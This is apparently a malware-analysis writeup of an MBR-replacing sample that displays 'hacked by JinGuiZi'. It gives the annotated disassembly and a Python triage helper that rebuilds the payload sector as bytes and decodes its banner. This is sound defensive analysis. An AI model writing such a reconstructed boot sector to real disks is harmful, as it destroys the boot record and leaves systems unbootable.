Use the A and C hotkeys to convert the bytes to strings and code; the adjusted result is below. The core functionality is just displaying a string through the int 10h interrupt.
seg000:7C00 seg000 segment byte public 'CODE' use16
seg000:7C00 assume cs:seg000
seg000:7C00 ;org 7C00h
seg000:7C00 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 mov ax, 12h ; set video mode; 12h = 640x480, 16 colours
seg000:7C03 int 10h ; - VIDEO - SET VIDEO MODE
seg000:7C03 ; AL = mode
seg000:7C05 mov bp, 7C18h ; es:bp = address of the string
seg000:7C08 mov cx, 13h ; string length 0x13
seg000:7C0B mov ax, 1301h ; ah = 13h, al = 01h: INT 10h function 13h, write string (teletype mode)
seg000:7C0E mov bx, 0Ch ; bl = 0Ch: attribute, black background with light red text
seg000:7C11 mov dx, 0 ; dh = 0, dl = 0: row 0, column 0
seg000:7C14 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14 ; ES:BP -> start of string
seg000:7C14 ; ---------------------------------------------------------------------------
seg000:7C16 db 0E2h ; E2 FE decodes to loop $ (a jump back to itself)
seg000:7C17 db 0FEh ;
seg000:7C18 db 'h'
seg000:7C19 db 61h ; a
seg000:7C1A db 63h ; c
seg000:7C1B db 'k'
seg000:7C1C db 65h ; e
seg000:7C1D db 64h ; d
seg000:7C1E db 20h
seg000:7C1F db 'b'
seg000:7C20 db 79h ; y
seg000:7C21 db 20h
seg000:7C22 db 'J'
seg000:7C23 db 'i'
seg000:7C24 db 6Eh ; n
seg000:7C25 db 47h ; G
seg000:7C26 db 75h ; u
seg000:7C27 db 69h ; i
seg000:7C28 db 'Z'
seg000:7C29 db 'i'
seg000:7C2A db 20h
seg000:7C2B db 20h
seg000:7C2C db 20h
seg000:7C2D db 20h
seg000:7C2E db 20h
seg000:7C2F db 20h
seg000:7C2F seg000 ends
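A triage helper for a dumped MBR sector, added here as an example (not the author's code): it checks the boot signature, walks the bootstrap code with a tiny decoder that knows only the opcodes this payload uses, and pulls out the string handed to INT 10h/AH=13h, which is exactly what the listing above does by hand. SAMPLE_SECTOR is constructed from the bytes in that listing; the zero padding and empty partition table behind the 0x30 payload bytes are an assumption, since the dump itself is not on the page.

```python
# Added example for this writeup; not code from the sample or the original thread.
import struct

LOAD_ADDR = 0x7C00   # segment base used when loading the dump into IDA

# Bootstrap bytes transcribed from the listing above (constructed sample).
_BOOTSTRAP = bytes.fromhex(
    "B81200"    # mov ax, 12h       set 640x480 16-colour mode
    "CD10"      # int 10h
    "BD187C"    # mov bp, 7C18h     ES:BP -> string
    "B91300"    # mov cx, 13h       19 characters
    "B80113"    # mov ax, 1301h     AH=13h write string, AL=1 update cursor
    "BB0C00"    # mov bx, 0Ch       page 0, attribute light red on black
    "BA0000"    # mov dx, 0         row 0, column 0
    "CD10"      # int 10h
    "E2FE"      # loop $            jump to itself
) + b"hacked by JinGuiZi      "
# Assumption: everything after the payload is zero, then the 0xAA55 signature.
SAMPLE_SECTOR = _BOOTSTRAP + b"\x00" * (510 - len(_BOOTSTRAP)) + b"\x55\xAA"

_REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]   # mov r16,imm16 order


def has_boot_signature(sector: bytes) -> bool:
    return len(sector) == 512 and sector[510:512] == b"\x55\xAA"


def partition_table_empty(sector: bytes) -> bool:
    """True if all four 16-byte partition entries are zero, i.e. the sector
    was replaced wholesale rather than patched around the table."""
    return not any(sector[0x1BE:0x1FE])


def decode_banner(sector: bytes, load_addr: int = LOAD_ADDR):
    """Return (text, attribute, row, column) for the first INT 10h issued with
    AH=13h, or None. Only mov r16,imm16 / int / loop are decoded; any other
    opcode ends the walk, which is enough for this payload."""
    regs, pc = {}, 0
    while pc + 1 < len(sector):
        op = sector[pc]
        if 0xB8 <= op <= 0xBF:                       # mov r16, imm16
            if pc + 3 > len(sector):
                return None
            regs[_REG16[op - 0xB8]] = struct.unpack_from("<H", sector, pc + 1)[0]
            pc += 3
        elif op == 0xCD:                             # int imm8
            if sector[pc + 1] == 0x10 and regs.get("ax", 0) >> 8 == 0x13:
                off, length = regs.get("bp", 0) - load_addr, regs.get("cx", 0)
                if not 0 <= off <= len(sector) - length:
                    return None                      # BP points outside the sector
                text = sector[off:off + length].decode("latin-1")
                bx, dx = regs.get("bx", 0), regs.get("dx", 0)
                return text, bx & 0xFF, dx >> 8, dx & 0xFF
            pc += 2
        elif op == 0xE2:                             # loop rel8
            if sector[pc + 1] == 0xFE:
                return None                          # loop to itself: nothing after it runs
            pc += 2
        else:
            return None
    return None


def triage(sector: bytes) -> dict:
    banner = decode_banner(sector)
    return {
        "boot_signature": has_boot_signature(sector),
        "partition_table_empty": partition_table_empty(sector),
        "banner": banner[0] if banner else None,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_SECTOR))
```

On a real dump, an empty partition table together with a recovered banner means the original MBR was overwritten rather than chained, so the partition layout has to be rebuilt from backup or by scanning for partition boot sectors.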